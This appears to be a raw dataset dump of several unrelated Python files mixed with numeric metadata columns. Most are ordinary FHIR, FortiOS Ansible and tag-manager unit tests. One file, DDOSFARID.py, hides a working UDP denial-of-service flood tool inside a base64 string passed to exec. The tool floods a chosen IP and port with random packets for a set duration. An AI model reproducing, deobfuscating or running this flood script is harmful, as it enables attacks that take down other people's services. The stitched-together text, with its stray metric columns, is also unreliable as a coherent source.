| 0.138522
| 15,290
| 313
| 158
| 48.84984
| 0.794033
| 0.099411
| 0
| 0.7125
| 0
| 0
| 0.156918
| 0.062782
| 0
| 0
| 0
| 0.003195
| 0.266667
| 1
| 0.070833
| false
| 0
| 0.029167
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c7bcd8c61a2bb1acdc63aee255a2c4e0f114aac
| 8,287
|
py
|
Python
|
fhirclient/r4models/immunizationrecommendation_tests.py
|
cspears-mitre/CapStatement
|
2390566ed75d420e0615e3a0aacb77e8c030fdcc
|
[
"Apache-2.0"
] | 1
|
2021-12-24T11:14:38.000Z
|
2021-12-24T11:14:38.000Z
|
fhirclient/r4models/immunizationrecommendation_tests.py
|
cspears-mitre/CapStatement
|
2390566ed75d420e0615e3a0aacb77e8c030fdcc
|
[
"Apache-2.0"
] | null | null | null |
fhirclient/r4models/immunizationrecommendation_tests.py
|
cspears-mitre/CapStatement
|
2390566ed75d420e0615e3a0aacb77e8c030fdcc
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 3.6.0-bd605d07 on 2018-12-20.
# 2018, SMART Health IT.
import os
import io
import unittest
import json
from . import immunizationrecommendation
from .fhirdate import FHIRDate
class ImmunizationRecommendationTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("ImmunizationRecommendation", js["resourceType"])
return immunizationrecommendation.ImmunizationRecommendation(js)
def testImmunizationRecommendation1(self):
inst = self.instantiate_from("immunizationrecommendation-example.json")
self.assertIsNotNone(inst, "Must have instantiated a ImmunizationRecommendation instance")
self.implImmunizationRecommendation1(inst)
js = inst.as_json()
self.assertEqual("ImmunizationRecommendation", js["resourceType"])
inst2 = immunizationrecommendation.ImmunizationRecommendation(js)
self.implImmunizationRecommendation1(inst2)
def implImmunizationRecommendation1(self, inst):
self.assertEqual(inst.date.date, FHIRDate("2015-02-09T11:04:15.817-05:00").date)
self.assertEqual(inst.date.as_json(), "2015-02-09T11:04:15.817-05:00")
self.assertEqual(inst.id, "example")
self.assertEqual(inst.identifier[0].system, "urn:ietf:rfc:3986")
self.assertEqual(inst.identifier[0].value, "urn:oid:1.3.6.1.4.1.21367.2005.3.7.1235")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://hl7.org/fhir/v3/ActReason")
self.assertEqual(inst.recommendation[0].dateCriterion[0].code.coding[0].code, "earliest")
self.assertEqual(inst.recommendation[0].dateCriterion[0].code.coding[0].display, "Earliest Date")
self.assertEqual(inst.recommendation[0].dateCriterion[0].code.coding[0].system, "http://example.org/fhir/CodeSystem/immunization-recommendation-date-criterion")
self.assertEqual(inst.recommendation[0].dateCriterion[0].value.date, FHIRDate("2015-12-01T00:00:00-05:00").date)
self.assertEqual(inst.recommendation[0].dateCriterion[0].value.as_json(), "2015-12-01T00:00:00-05:00")
self.assertEqual(inst.recommendation[0].dateCriterion[1].code.coding[0].code, "recommended")
self.assertEqual(inst.recommendation[0].dateCriterion[1].code.coding[0].display, "Recommended")
self.assertEqual(inst.recommendation[0].dateCriterion[1].code.coding[0].system, "http://example.org/fhir/CodeSystem/immunization-recommendation-date-criterion")
self.assertEqual(inst.recommendation[0].dateCriterion[1].value.date, FHIRDate("2015-12-01T00:00:00-05:00").date)
self.assertEqual(inst.recommendation[0].dateCriterion[1].value.as_json(), "2015-12-01T00:00:00-05:00")
self.assertEqual(inst.recommendation[0].dateCriterion[2].code.coding[0].code, "overdue")
self.assertEqual(inst.recommendation[0].dateCriterion[2].code.coding[0].display, "Past Due Date")
self.assertEqual(inst.recommendation[0].dateCriterion[2].code.coding[0].system, "http://example.org/fhir/CodeSystem/immunization-recommendation-date-criterion")
self.assertEqual(inst.recommendation[0].dateCriterion[2].value.date, FHIRDate("2016-12-28T00:00:00-05:00").date)
self.assertEqual(inst.recommendation[0].dateCriterion[2].value.as_json(), "2016-12-28T00:00:00-05:00")
self.assertEqual(inst.recommendation[0].description, "First sequence in protocol")
self.assertEqual(inst.recommendation[0].doseNumberPositiveInt, 1)
self.assertEqual(inst.recommendation[0].forecastStatus.text, "Not Complete")
self.assertEqual(inst.recommendation[0].series, "Vaccination Series 1")
self.assertEqual(inst.recommendation[0].seriesDosesPositiveInt, 3)
self.assertEqual(inst.recommendation[0].vaccineCode[0].coding[0].code, "14745005")
self.assertEqual(inst.recommendation[0].vaccineCode[0].coding[0].display, "Hepatitis A vaccine")
self.assertEqual(inst.recommendation[0].vaccineCode[0].coding[0].system, "http://snomed.info/sct")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">Authored by Joginder Madra</div>")
self.assertEqual(inst.text.status, "generated")
def testImmunizationRecommendation2(self):
inst = self.instantiate_from("immunizationrecommendation-example-target-disease.json")
self.assertIsNotNone(inst, "Must have instantiated a ImmunizationRecommendation instance")
self.implImmunizationRecommendation2(inst)
js = inst.as_json()
self.assertEqual("ImmunizationRecommendation", js["resourceType"])
inst2 = immunizationrecommendation.ImmunizationRecommendation(js)
self.implImmunizationRecommendation2(inst2)
def implImmunizationRecommendation2(self, inst):
self.assertEqual(inst.date.date, FHIRDate("2015-02-09T11:04:15.817-05:00").date)
self.assertEqual(inst.date.as_json(), "2015-02-09T11:04:15.817-05:00")
self.assertEqual(inst.id, "example")
self.assertEqual(inst.identifier[0].system, "urn:ietf:rfc:3986")
self.assertEqual(inst.identifier[0].value, "urn:oid:1.3.6.1.4.1.21367.2005.3.7.1235")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://hl7.org/fhir/v3/ActReason")
self.assertEqual(inst.recommendation[0].dateCriterion[0].code.coding[0].code, "30981-5")
self.assertEqual(inst.recommendation[0].dateCriterion[0].code.coding[0].display, "Earliest date to give")
self.assertEqual(inst.recommendation[0].dateCriterion[0].code.coding[0].system, "http://loinc.org")
self.assertEqual(inst.recommendation[0].dateCriterion[0].value.date, FHIRDate("2015-12-01T00:00:00-05:00").date)
self.assertEqual(inst.recommendation[0].dateCriterion[0].value.as_json(), "2015-12-01T00:00:00-05:00")
self.assertEqual(inst.recommendation[0].dateCriterion[1].code.coding[0].code, "recommended")
self.assertEqual(inst.recommendation[0].dateCriterion[1].code.coding[0].display, "Recommended")
self.assertEqual(inst.recommendation[0].dateCriterion[1].code.coding[0].system, "http://example.org/fhir/CodeSystem/immunization-recommendation-date-criterion")
self.assertEqual(inst.recommendation[0].dateCriterion[1].value.date, FHIRDate("2015-12-01T00:00:00-05:00").date)
self.assertEqual(inst.recommendation[0].dateCriterion[1].value.as_json(), "2015-12-01T00:00:00-05:00")
self.assertEqual(inst.recommendation[0].dateCriterion[2].code.coding[0].code, "overdue")
self.assertEqual(inst.recommendation[0].dateCriterion[2].code.coding[0].display, "Past Due Date")
self.assertEqual(inst.recommendation[0].dateCriterion[2].code.coding[0].system, "http://example.org/fhir/CodeSystem/immunization-recommendation-date-criterion")
self.assertEqual(inst.recommendation[0].dateCriterion[2].value.date, FHIRDate("2016-12-28T00:00:00-05:00").date)
self.assertEqual(inst.recommendation[0].dateCriterion[2].value.as_json(), "2016-12-28T00:00:00-05:00")
self.assertEqual(inst.recommendation[0].description, "First sequence in protocol")
self.assertEqual(inst.recommendation[0].doseNumberPositiveInt, 1)
self.assertEqual(inst.recommendation[0].forecastStatus.text, "Not Complete")
self.assertEqual(inst.recommendation[0].series, "Vaccination Series 1")
self.assertEqual(inst.recommendation[0].seriesDosesPositiveInt, 3)
self.assertEqual(inst.recommendation[0].targetDisease.coding[0].code, "40468003")
self.assertEqual(inst.recommendation[0].targetDisease.coding[0].system, "http://snomed.info/sct")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">Authored by Joginder Madra</div>")
self.assertEqual(inst.text.status, "generated")
| 73.336283
| 168
| 0.722457
| 1,025
| 8,287
| 5.826341
| 0.15122
| 0.170797
| 0.206798
| 0.24866
| 0.866879
| 0.857669
| 0.857669
| 0.837575
| 0.826356
| 0.806597
| 0
| 0.073886
| 0.122964
| 8,287
| 112
| 169
| 73.991071
| 0.747799
| 0.014119
| 0
| 0.65625
| 1
| 0.020833
| 0.225257
| 0.090397
| 0
| 0
| 0
| 0
| 0.729167
| 1
| 0.052083
| false
| 0
| 0.0625
| 0
| 0.135417
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
1c9a320a2f92aaf68f458e3d86d8b3a10588bf95
| 340
|
py
|
Python
|
solution.py
|
mathewphilipc/homemade_yolo
|
4d1da96b833459aa323752ee9cb3e3c633d7bca9
|
[
"MIT"
] | null | null | null |
solution.py
|
mathewphilipc/homemade_yolo
|
4d1da96b833459aa323752ee9cb3e3c633d7bca9
|
[
"MIT"
] | null | null | null |
solution.py
|
mathewphilipc/homemade_yolo
|
4d1da96b833459aa323752ee9cb3e3c633d7bca9
|
[
"MIT"
] | null | null | null |
def contains_banana(img):
"""
Change the contents of this function so it behaves correctly
"""
return -3.14159
def crop_image(img, quadrant):
"""
Change the contents of this function so it behaves correctly
"""
return img
def find_banana(img):
"""
Change the contents of this function so it behaves correctly
"""
return "None"
| 20
| 61
| 0.723529
| 50
| 340
| 4.86
| 0.44
| 0.111111
| 0.209877
| 0.234568
| 0.777778
| 0.777778
| 0.777778
| 0.777778
| 0.777778
| 0.777778
| 0
| 0.021583
| 0.182353
| 340
| 17
| 62
| 20
| 0.852518
| 0.535294
| 0
| 0
| 0
| 0
| 0.030534
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
98d25361302cb6cc6bf0c6da61f959885619c9d8
| 11,853
|
py
|
Python
|
v6.0.5/router/test_fortios_router_policy.py
|
fortinet-solutions-cse/ansible_fgt_modules
|
c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
|
[
"Apache-2.0"
] | 14
|
2018-09-25T20:35:25.000Z
|
2021-07-14T04:30:54.000Z
|
v6.0.6/router/test_fortios_router_policy.py
|
fortinet-solutions-cse/ansible_fgt_modules
|
c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
|
[
"Apache-2.0"
] | 32
|
2018-10-09T04:13:42.000Z
|
2020-05-11T07:20:28.000Z
|
v6.0.5/router/test_fortios_router_policy.py
|
fortinet-solutions-cse/ansible_fgt_modules
|
c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
|
[
"Apache-2.0"
] | 11
|
2018-10-09T00:14:53.000Z
|
2021-11-03T10:54:09.000Z
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_router_policy
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_router_policy.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_router_policy_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'router_policy': {
'action': 'deny',
'comments': 'test_value_4',
'dst_negate': 'enable',
'end_port': '6',
'end_source_port': '7',
'gateway': 'test_value_8',
'output_device': 'test_value_9',
'protocol': '10',
'seq_num': '11',
'src_negate': 'enable',
'start_port': '13',
'start_source_port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos_mask': 'test_value_17'
},
'vdom': 'root'}
is_error, changed, response = fortios_router_policy.fortios_router(input_data, fos_instance)
expected_data = {
'action': 'deny',
'comments': 'test_value_4',
'dst-negate': 'enable',
'end-port': '6',
'end-source-port': '7',
'gateway': 'test_value_8',
'output-device': 'test_value_9',
'protocol': '10',
'seq-num': '11',
'src-negate': 'enable',
'start-port': '13',
'start-source-port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos-mask': 'test_value_17'
}
set_method_mock.assert_called_with('router', 'policy', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_router_policy_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'router_policy': {
'action': 'deny',
'comments': 'test_value_4',
'dst_negate': 'enable',
'end_port': '6',
'end_source_port': '7',
'gateway': 'test_value_8',
'output_device': 'test_value_9',
'protocol': '10',
'seq_num': '11',
'src_negate': 'enable',
'start_port': '13',
'start_source_port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos_mask': 'test_value_17'
},
'vdom': 'root'}
is_error, changed, response = fortios_router_policy.fortios_router(input_data, fos_instance)
expected_data = {
'action': 'deny',
'comments': 'test_value_4',
'dst-negate': 'enable',
'end-port': '6',
'end-source-port': '7',
'gateway': 'test_value_8',
'output-device': 'test_value_9',
'protocol': '10',
'seq-num': '11',
'src-negate': 'enable',
'start-port': '13',
'start-source-port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos-mask': 'test_value_17'
}
set_method_mock.assert_called_with('router', 'policy', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_router_policy_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'router_policy': {
'action': 'deny',
'comments': 'test_value_4',
'dst_negate': 'enable',
'end_port': '6',
'end_source_port': '7',
'gateway': 'test_value_8',
'output_device': 'test_value_9',
'protocol': '10',
'seq_num': '11',
'src_negate': 'enable',
'start_port': '13',
'start_source_port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos_mask': 'test_value_17'
},
'vdom': 'root'}
is_error, changed, response = fortios_router_policy.fortios_router(input_data, fos_instance)
delete_method_mock.assert_called_with('router', 'policy', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_router_policy_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'router_policy': {
'action': 'deny',
'comments': 'test_value_4',
'dst_negate': 'enable',
'end_port': '6',
'end_source_port': '7',
'gateway': 'test_value_8',
'output_device': 'test_value_9',
'protocol': '10',
'seq_num': '11',
'src_negate': 'enable',
'start_port': '13',
'start_source_port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos_mask': 'test_value_17'
},
'vdom': 'root'}
is_error, changed, response = fortios_router_policy.fortios_router(input_data, fos_instance)
delete_method_mock.assert_called_with('router', 'policy', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_router_policy_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'router_policy': {
'action': 'deny',
'comments': 'test_value_4',
'dst_negate': 'enable',
'end_port': '6',
'end_source_port': '7',
'gateway': 'test_value_8',
'output_device': 'test_value_9',
'protocol': '10',
'seq_num': '11',
'src_negate': 'enable',
'start_port': '13',
'start_source_port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos_mask': 'test_value_17'
},
'vdom': 'root'}
is_error, changed, response = fortios_router_policy.fortios_router(input_data, fos_instance)
expected_data = {
'action': 'deny',
'comments': 'test_value_4',
'dst-negate': 'enable',
'end-port': '6',
'end-source-port': '7',
'gateway': 'test_value_8',
'output-device': 'test_value_9',
'protocol': '10',
'seq-num': '11',
'src-negate': 'enable',
'start-port': '13',
'start-source-port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos-mask': 'test_value_17'
}
set_method_mock.assert_called_with('router', 'policy', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_router_policy_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'router_policy': {
'random_attribute_not_valid': 'tag',
'action': 'deny',
'comments': 'test_value_4',
'dst_negate': 'enable',
'end_port': '6',
'end_source_port': '7',
'gateway': 'test_value_8',
'output_device': 'test_value_9',
'protocol': '10',
'seq_num': '11',
'src_negate': 'enable',
'start_port': '13',
'start_source_port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos_mask': 'test_value_17'
},
'vdom': 'root'}
is_error, changed, response = fortios_router_policy.fortios_router(input_data, fos_instance)
expected_data = {
'action': 'deny',
'comments': 'test_value_4',
'dst-negate': 'enable',
'end-port': '6',
'end-source-port': '7',
'gateway': 'test_value_8',
'output-device': 'test_value_9',
'protocol': '10',
'seq-num': '11',
'src-negate': 'enable',
'start-port': '13',
'start-source-port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos-mask': 'test_value_17'
}
set_method_mock.assert_called_with('router', 'policy', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
| 34.861765
| 142
| 0.604995
| 1,352
| 11,853
| 5.001479
| 0.139053
| 0.066548
| 0.043478
| 0.048063
| 0.846051
| 0.83703
| 0.822981
| 0.822981
| 0.822981
| 0.822981
| 0
| 0.023893
| 0.251413
| 11,853
| 339
| 143
| 34.964602
| 0.738195
| 0.05602
| 0
| 0.862816
| 0
| 0
| 0.353889
| 0.077866
| 0
| 0
| 0
| 0
| 0.129964
| 1
| 0.025271
| false
| 0
| 0.028881
| 0
| 0.057762
| 0.00361
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
98d4a6f974fc89484c35fa782c6605edd9a0de88
| 3,148
|
py
|
Python
|
DDOSFARID.py
|
DARKFARID13/DDOSWEB
|
ba28abaad211098a384394c6fc19f027b5e23fd4
|
[
"Apache-2.0"
] | null | null | null |
DDOSFARID.py
|
DARKFARID13/DDOSWEB
|
ba28abaad211098a384394c6fc19f027b5e23fd4
|
[
"Apache-2.0"
] | null | null | null |
DDOSFARID.py
|
DARKFARID13/DDOSWEB
|
ba28abaad211098a384394c6fc19f027b5e23fd4
|
[
"Apache-2.0"
] | null | null | null |
import base64
exec(base64.b64decode('aW1wb3J0IHRpbWUKaW1wb3J0IHNvY2tldAppbXBvcnQgcmFuZG9tCmltcG9ydCBzeXMKZGVmIHVzYWdlKCk6CiAgICBwcmludCAiXDAzM1sxOzMybSMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyIKICAgIHByaW50ICIjLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1bXDAzM1sxOzkxbUZBUklELURET1NcMDMzWzE7MzJtXS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tIyIKICAgIHByaW50ICIjLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSMiCiAgICBwcmludCAiIyAgIFwwMzNbMTs5MW1Db21tYW5kOiAiICJweXRob24yIFRhbWZhbkRkb3MucHkgIiAiPGlwPiA8cG9ydD4gPHBhY2tldD4gXDAzM1sxOzMybSAjIgogICAgcHJpbnQgIiMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICMjIgogICAgcHJpbnQgIiNcMDMzWzE7OTFtQ3JlYXRvcjpNUi5GNFIxRCAgXDAzM1sxOzMybSMjICAgICAgIyAgICAgICMgICAgICAgICAgICAgICAgICAgICAjIyIKICAgIHByaW50ICIjXDAzM1sxOzkxbVRlYW0gICA6IE1DSSAgICAgICAgXDAzM1sxOzMybSMjICAgICAjICAgICAgIyAgICAgICAgICAgICAgICAgICAgICMjIgogICAgcHJpbnQgIiNcMDMzWzE7OTFtVmVyc2lvbjoxLjAgICAgICAgIFwwMzNbMTszMm0jIyAgICAgICMgICAgICAjICAgICAgICAgICAgICAgICAgICAgIyMiCiAgICBwcmludCAiI1wwMzNbMTs5MW1UUUFkbWluOk1SLkY0UjFEWC1NclJhcGhhZWwtTXJUaGVTcGFtLU1yLkRjLU1yQmxhY2tIYXQgICMjIgogICAgcHJpbnQgIiNcMDMzWzE7OTFtICAgICAgIDpMaWtlV2hpdGUtTXJVa25vd24tTXJTYW5jaGV6LU1yQmltYm9uZy1NclRhbWZhbiAjIyIKICAgIHByaW50ICIjICAgICAgICAgICAgICAgICAgICAgXDAzM1sxOzkxbSAjIyAgICAgXDAzM1sxOzMybSMgIFwwMzNbMTs5MW0gIFwwMzNbMTszMiAgICMjIgogICAgcHJpbnQgIiMgICAgICAgICAgICAgICAgICAgICBcMDMzWzE7OTFtIyMgIFwwMzNbMTszMm0jIyMgICBcMDMzWzE7OTFtICBcMDMzWzE7MzJtICAgIyMiCiAgICBwcmludCAiIyAgICAgICAgICAgICAgIFwwMzNbMTs5MW08LS1bTVVTTElNIENZQkVSIElORE9ORVNJQV0tLT4gICAgICAgICBcMDMzWzE7MzJtICAjIyIKICAgIHByaW50ICIjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMiCiAgICBwcmludCAiICAgICBNZW1iZXI6TXIuWmVlWF9JTkQtSy5SLkEuUy1FZWxlaElORC1XaG9BbUktV2V5dC5UbSIKICAgIHByaW50ICIgICAgICAgICAgIFBlbWJ1YXREZG9zMTpNUi5GNFIxRDE5ODcgQ3liZXIgVGVhbSIKICAgIHByaW50ICIgICAgICAgICAgUGVtYnVhdERkb3MyOk11c2xpbSBDeWJlciBJbmRvbmVzaWEiCmRlZiBmbG9vZCh2aWN0aW0sIHZwb3J0LCBkdXJhdGlvbik6CiAgICAjIFN1cHBvcnQgdXMgeWFha2suLi4gOikKICAgICMgT2tleSBKYWRpIGRpc2luaSBzYXlhIG1lbWJ1YXQgc2VydmVyLCBLZXRpa2Egc2F5YSBtZW1hbmdnaWwgIlNPQ0tfREdSQU0iIGl0dSAgbWVudW5qdWtrYW4gIFVEUCB0eXBlIHByb2dyYW0KICAgIGNsaWVudCA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQogICAgIyAyMDAwMCByZXByZXNlbnRhc2kgc2F0dSBieXRlIGtlIHNlcnZlcgogICAgYnl0ZXMgPSByYW5kb20uX3VyYW5kb20oMjAwMDApCiAgICB0aW1lb3V0ID0gIHRpbWUudGltZSgpICsgZHVyYXRpb24KICAgIHNlbnQgPSAzMDAwCgogICAgd2hpbGUgMToKICAgICAgICBpZiB0aW1lLnRpbWUoKSA+IHRpbWVvdXQ6CiAgICAgICAgICAgIGJyZWFrCiAgICAgICAgZWxzZToKICAgICAgICAgICAgcGFzcwogICAgICAgIGNsaWVudC5zZW5kdG8oYnl0ZXMsICh2aWN0aW0sIHZwb3J0KSkKICAgICAgICBzZW50ID0gc2VudCArIDEKICAgICAgICBwcmludCAiXDAzM1sxOzkxbU1lbXVsYWkgXDAzM1sxOzMybSVzIFwwMzNbMTs5MW1tZW5naXJpbSBwYWtldCBcMDMzWzE7MzJtJXMgXDAzM1sxOzkxbXBhZGEgcG9ydCBcMDMzWzE7MzJtJXMgIiUoc2VudCwgdmljdGltLCB2cG9ydCkKZGVmIG1haW4oKToKICAgIHByaW50IGxlbihzeXMuYXJndikKICAgIGlmIGxlbihzeXMuYXJndikgIT0gNDoKICAgICAgICB1c2FnZSgpCiAgICBlbHNlOgogICAgICAgIGZsb29kKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pLCBpbnQoc3lzLmFyZ3ZbM10pKQoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIG1haW4oKQoK'))
| 1,574
| 3,134
| 0.996823
| 7
| 3,148
| 448.285714
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085188
| 0.000635
| 3,148
| 2
| 3,134
| 1,574
| 0.91227
| 0
| 0
| 0
| 0
| 0
| 0.98698
| 0.98698
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
98de5f60f6800964fb0aadbbed321af034f8b7f6
| 109,857
|
py
|
Python
|
tests/tag/test_tagmanager.py
|
ni/nisystemlink-clients-python
|
2c76de8c21f8a3c2fe845337fe5a7f8f86ec6eef
|
[
"MIT"
] | 8
|
2020-07-23T16:34:57.000Z
|
2022-02-25T02:43:15.000Z
|
tests/tag/test_tagmanager.py
|
ni/nisystemlink-clients-python
|
2c76de8c21f8a3c2fe845337fe5a7f8f86ec6eef
|
[
"MIT"
] | 6
|
2020-07-23T16:43:09.000Z
|
2020-12-16T14:29:37.000Z
|
tests/tag/test_tagmanager.py
|
ni/nisystemlink-clients-python
|
2c76de8c21f8a3c2fe845337fe5a7f8f86ec6eef
|
[
"MIT"
] | 6
|
2020-07-14T22:17:00.000Z
|
2022-03-07T13:05:59.000Z
|
import asyncio
import time
import uuid
from collections import OrderedDict
from datetime import datetime, timedelta, timezone
from unittest import mock
import pytest # type: ignore
from systemlink.clients import core, tag as tbase
from .http.httpclienttestbase import HttpClientTestBase, MockResponse
from ..anyorderlist import AnyOrderList
class TestTagManager(HttpClientTestBase):
def setup_method(self, method):
super().setup_method(method)
def get_client_mock(*args, **kwargs):
return self._client
with mock.patch(
"systemlink.clients.tag._tag_manager.HttpClient", get_client_mock
):
self._uut = tbase.TagManager(object())
def test__metadata_supplied__create_selection__metadata_used_without_query(self):
tags = [
tbase.TagData("tag1"),
tbase.TagData("tag2", tbase.DataType.BOOLEAN),
tbase.TagData(
"tag3", tbase.DataType.DATE_TIME, ["keyword1"], {"prop1": "value1"}
),
]
selection = self._uut.create_selection(tags)
assert self._client.all_requests.call_count == 0
assert [t.path for t in tags] == sorted(selection.paths)
assert tags == list(sorted(selection.metadata.values(), key=(lambda t: t.path)))
